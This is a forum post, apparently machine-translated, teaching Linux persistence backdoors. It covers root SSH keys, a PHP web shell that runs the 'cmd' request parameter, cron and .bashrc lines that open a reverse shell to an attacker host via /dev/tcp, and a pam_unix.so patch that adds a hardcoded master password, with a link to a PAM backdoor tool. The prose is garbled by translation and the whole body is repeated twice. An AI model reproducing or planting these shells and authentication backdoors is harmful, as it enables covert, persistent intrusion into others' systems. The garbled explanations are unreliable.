- Thread Author
- #1
Linux Backdoors all the different techniques
SSH Backdoors
Ssh Backdoors use our ssh keys some people prefer for home use.
the user becomes root for the user with the highest privileges.
Let's generate an ssh key with ssh-keygen
We now have 2 keys. 1 key and 1 public key are there now in migration and public migration for /root/.ssh.
Disable public key renaming authorized_keys
Now login as root.
Note: This backdoor doesn't really count. The person in charge will notice.
PHP Backdoors
A Linux root will be older, large web root and or any sale from roots in use.
The web root is located at /var/www/html.
This unit of code takes the "cmd" parameter and runs whatever is given that parameter.
Notice the "$_REQUEST ['cmd'])"; it means or means you can pass this parameter in GET POST data.
Suggest a few to hide it
You can add to an existing php extension
"with another outfit cmd parameter"
CronJob Backdoors
what is a cronjob
It is a business planner used in computer tools. Cron is used to plan software environments, for selections and dates, or to schedule work.
See /etc/cronjob files
Notice 2 letters: "m and h"
These are the letters whether the task should be run ten hours or one.
You can see that there is a "*" under the "h". This means that he will run the clock.
Add this to the cronjob extension
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/port 0>&1'
Don't forget to listen on the port it specified
Note: This backdoor doesn't really count. The person in charge will notice.
.bashrc Backdoors
Bas as a staging environment, ".bashrc" in a staging main is prepared.
For ".bashrc" users to ".bashrc" files, you can run this command.
echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc
Your nc reader should always be ready for when your user will open it.
Note: we can say that this backdoor is hidden
pam_unix.so Backdoors
"Pam_unix.so" is one of the files responsible for authentication in Linux.
To verify the user password for the file "pam_ix.so", "unix_ify_password" can meet.
Did you see what I added?
"if (strcmp(p,"0xMitsurugi")! = 0)"
We are improving the "0xMitsurugi" test with the "p" in the screenshot.
It can be entered by "P", refers to the password by the user.
you can see "! = 0" at the end of the expression. It means "successful".
So IF setting "p" (user controlled) and "0xMitsurugi" are NOT the same... it will be used for "unix_verify_password".
If the string "p" (security by the user) and the string "0xMitsurugi" are the same, it confirms authentication. We mark success using "PAM_SUCCESS"
this backdoor consists of your own password "pam_file.so" file.
To download the password you added to the file, it can verify that you are authenticated with that password until the password is removed from "pam_unix.so".
There is a script that will do this automatically.
SSH Backdoors
Ssh Backdoors use our ssh keys some people prefer for home use.
the user becomes root for the user with the highest privileges.
Let's generate an ssh key with ssh-keygen
We now have 2 keys. 1 key and 1 public key are there now in migration and public migration for /root/.ssh.
Disable public key renaming authorized_keys
Now login as root.
Note: This backdoor doesn't really count. The person in charge will notice.
PHP Backdoors
A Linux root will be older, large web root and or any sale from roots in use.
The web root is located at /var/www/html.
Code:
<? php
if (isset ($ _ REQUEST ['cmd'])) {
echo "<pre>". shell_exec ($ _ REQUEST ['cmd']). "</pre>";
}
?>
This unit of code takes the "cmd" parameter and runs whatever is given that parameter.
Notice the "$_REQUEST ['cmd'])"; it means or means you can pass this parameter in GET POST data.
Suggest a few to hide it
You can add to an existing php extension
"with another outfit cmd parameter"
CronJob Backdoors
what is a cronjob
It is a business planner used in computer tools. Cron is used to plan software environments, for selections and dates, or to schedule work.
See /etc/cronjob files
Notice 2 letters: "m and h"
These are the letters whether the task should be run ten hours or one.
You can see that there is a "*" under the "h". This means that he will run the clock.
Add this to the cronjob extension
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/port 0>&1'
Don't forget to listen on the port it specified
Note: This backdoor doesn't really count. The person in charge will notice.
.bashrc Backdoors
Bas as a staging environment, ".bashrc" in a staging main is prepared.
For ".bashrc" users to ".bashrc" files, you can run this command.
echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc
Your nc reader should always be ready for when your user will open it.
Note: we can say that this backdoor is hidden
pam_unix.so Backdoors
"Pam_unix.so" is one of the files responsible for authentication in Linux.
To verify the user password for the file "pam_ix.so", "unix_ify_password" can meet.
Did you see what I added?
"if (strcmp(p,"0xMitsurugi")! = 0)"
We are improving the "0xMitsurugi" test with the "p" in the screenshot.
It can be entered by "P", refers to the password by the user.
you can see "! = 0" at the end of the expression. It means "successful".
So IF setting "p" (user controlled) and "0xMitsurugi" are NOT the same... it will be used for "unix_verify_password".
If the string "p" (security by the user) and the string "0xMitsurugi" are the same, it confirms authentication. We mark success using "PAM_SUCCESS"
this backdoor consists of your own password "pam_file.so" file.
To download the password you added to the file, it can verify that you are authenticated with that password until the password is removed from "pam_unix.so".
There is a script that will do this automatically.
GitHub - zephrax/linux-pam-backdoor: Linux PAM Backdoor
Linux PAM Backdoor. Contribute to zephrax/linux-pam-backdoor development by creating an account on GitHub.
github.com